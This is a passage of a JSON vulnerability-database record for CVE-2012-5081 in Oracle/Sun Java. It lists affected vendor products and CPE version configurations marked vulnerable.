tester", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "8.5.0.3" }, { "model": "infosphere master data management server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.0" }, { "model": "jre beta", "scope": "eq", "trust": 0.3, "vendor": "sun", "version": "1.5.0" }, { "model": "tivoli federated identity manager business gateway", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.1" }, { "model": "jdk", "scope": "eq", "trust": 0.3, "vendor": "sun", "version": "1.5" }, { "model": "esx", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "4.0" }, { "model": "enterprise server x86 64", "scope": "eq", "trust": 0.3, "vendor": "mandrakesoft", "version": "5" }, { "model": "jdk 07", "scope": "eq", "trust": 0.3, "vendor": "sun", "version": "1.5" }, { "model": "opensuse", "scope": "eq", "trust": 0.3, "vendor": "s u s e", "version": "12.1" }, { "model": "security siteprotector system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0" }, { "model": "infosphere information server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.1" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "1.0" }, { "model": "network and security manager software r2", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "2012.2" }, { "model": "enterprise linux server supplementary", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "network and security manager software r5", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "2012.2" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5" }, { "model": "cosminexus", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6.0" }, { "model": "rational system architect", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "11.4.2.2" }, { "model": "infosphere information server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.7" }, { "model": "enterprise server", "scope": "eq", "trust": 0.3, "vendor": "mandrakesoft", "version": "5" }, { "model": "jdk 1.5.0 11-b03", "scope": null, "trust": 0.3, "vendor": "sun", "version": null }, { "model": "hirdb", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "8.0" }, { "model": "aura communication manager utility services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "esx", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "4.1" }, { "model": "nonstop server", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6" }, { "model": "openpages grc platform", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "6.2.1" }, { "model": "cognos business intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1.1" }, { "model": "network and security manager software r8", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "2012.2" }, { "model": "enterprise linux workstation supplementary", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "tivoli application dependency discovery manager", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.2.1.4" }, { "model": "network and security manager software r4", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "2012.2" }, { "model": "tivoli netcool/omnibus web gui", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.3.1" }, { "model": "infosphere streams", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0" }, { "model": "rational appscan enterprise", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "8.7" }, { "model": "rational functional tester", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "8.3.0.1" }, { "model": "vcenter server", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "4.0" }, { "model": "websphere message broker", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.1" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6" }, { "model": "tivoli storage manager administration center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "cosminexus", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "7.0" }, { "model": "rational service tester", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "8.3.0.1" }, { "model": "openpages grc platform", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2" }, { "model": "rational appscan enterprise", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.6" }, { "model": "rational policy tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.6" }, { "model": "virtualcenter", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "2.5" }, { "model": "db2 performance expert", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1.2" }, { "model": "cosminexus", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "9.0" }, { "model": "cognos business intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1" }, { "model": "vcenter server", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "4.1" }, { "model": "cognos business intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2" }, { "model": "infosphere optim performance manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.1.1" }, { "model": "hp-ux b.11.31", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.2" }, { "model": "aura experience portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "vcenter update manager", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.0" }, { "model": "jre 07", "scope": "eq", "trust": 0.3, "vendor": "sun", "version": "1.5" }, { "model": "nonstop server j06.07.01", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "rational requirements composer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0" }, { "model": "jdk 0 09", "scope": "eq", "trust": 0.3, "vendor": "sun", "version": "1.5" }, { "model": "jre 1.5.0 08", "scope": null, "trust": 0.3, "vendor": "sun", "version": null }, { "model": "rational host on-demand", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "11.0.7" }, { "model": "cosminexus", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "5.0" }, { "model": "centos", "scope": "eq", "trust": 0.3, "vendor": "centos", "version": "5" }, { "model": "rational team concert", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.1" }, { "model": "jdk 1.5.0 07-b03", "scope": null, "trust": 0.3, "vendor": "sun", "version": null }, { "model": "network and security manager software r6", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "2012.2" }, { "model": "vcenter update manager", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.1" }, { "model": "tivoli netcool/omnibus web gui", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.3" }, { "model": "aura experience portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.1" }, { "model": "db2 performance expert", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2.3" }, { "model": "ucosminexus service platform", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "0" }, { "model": "websphere mq server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.1" }, { "model": "jdk 1.6.0 01-b06", "scope": null, "trust": 0.3, "vendor": "sun", "version": null }, { "model": "rational build forge", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "centos", "scope": "eq", "trust": 0.3, "vendor": "centos", "version": "6" }, { "model": "aura communication manager utility services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "enterprise linux hpc node supplementary", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "enterprise linux desktop supplementary client", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "5" }, { "model": "labs qradar risk manager mr2", "scope": "ne", "trust": 0.3, "vendor": "q1", "version": "7.1" }, { "model": "linux", "scope": null, "trust": 0.3, "vendor": "gentoo", "version": null }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.1" }, { "model": "processing kit for xml", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "0" }, { "model": "sdk 02", "scope": "eq", "trust": 0.3, "vendor": "sun", "version": "1.4.2" }, { "model": "rational host on-demand", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "11.0" }, { "model": "rational team concert", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "4.0.3" }, { "model": "jdk 0 03", "scope": "eq", "trust": 0.3, "vendor": "sun", "version": "1.5" }, { "model": "ucosminexus portal framework", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "0" }, { "model": "aura communication manager utility services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "update manager update", "scope": "ne", "trust": 0.3, "vendor": "vmware", "version": "5.11" }, { "model": "rational performance tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.3" }, { "model": "hirdb", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "7.0" }, { "model": "icedtea", "scope": "ne", "trust": 0.3, "vendor": "icedtea", "version": "2.2.3" }, { "model": "network and security manager software r3", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "2012.2" }, { "model": "rational team concert", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0" }, { "model": "infosphere optim performance manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1" }, { "model": "nonstop server h06.18.01", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "rational build forge", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2" } ], "sources": [ { "db": "CERT/CC", "id": "VU#144389" }, { "db": "BID", "id": "56071" }, { "db": "CNNVD", "id": "CNNVD-201210-293" }, { "db": "NVD", "id": "CVE-2012-5081" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:oracle:jdk:*:update7:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "1.7.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.7.0:update6:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.7.0:update6:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:*:update7:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "1.7.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.7.0:update5:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.7.0:update3:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.7.0:update2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.7.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.7.0:update2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.7.0:update3:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.7.0:update1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.7.0:update1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.7.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.7.0:update5:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.7.0:update4:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.7.0:update4:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update_4:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:update_3:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:update_5:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update_7:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update_19:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update_13:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:update_13:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:update_1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:update_2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update_3:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update_16:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update_5:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:update_10:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update_14:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:update_19:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:update_16:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:update_15:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:update_18:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update_17:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update_10:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:update_21:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:update_20:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:update_6:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:update_17:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0.200:update20:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update_11:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update1_b06:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.6.0:update23:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.6.0:update24:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:update_7:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:update_12:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:update_11:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.6.0:update33:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.6.0:update34:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.6.0:update25:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.6.0:update24:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.6.0:update23:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update_15:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update_6:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.6.0:update34:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:*:update35:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "1.6.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.6.0:update31:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.6.0:update25:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.6.0:update26:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:update_4:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:update_14:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:*:update35:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "1.6.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.6.0:update31:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.6.0:update22:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0.210:update21:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.6.0:update22:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.6.0:update30:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.6.0:update32:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.6.0:update27:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.6.0:update26:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update_18:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.6.0:update32:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.6.0:update33:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.6.0:update27:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.6.0:update29:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.6.0:update30:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.6.0:update29:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update_12:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update22:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update31:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update20:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update15:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update18:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update18:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update27:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update3:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update27:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update26:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update24:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update16:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update8:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update11:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update17:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update9:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update28:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update29:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update21:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update12:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update11:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update31:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update26:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update13:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update22:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update6:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update21:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update16:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update19:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update10:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update9:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update4:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update23:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update19:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update12:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:*:update36:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "1.5.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update25:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update17:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update7:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:*:update36:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "1.5.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update24:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update29:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update28:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update20:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update4:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update3:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update7_b03:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update5:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update33:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update25:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update14:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update8:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update7:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update33:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update23:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update15:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": 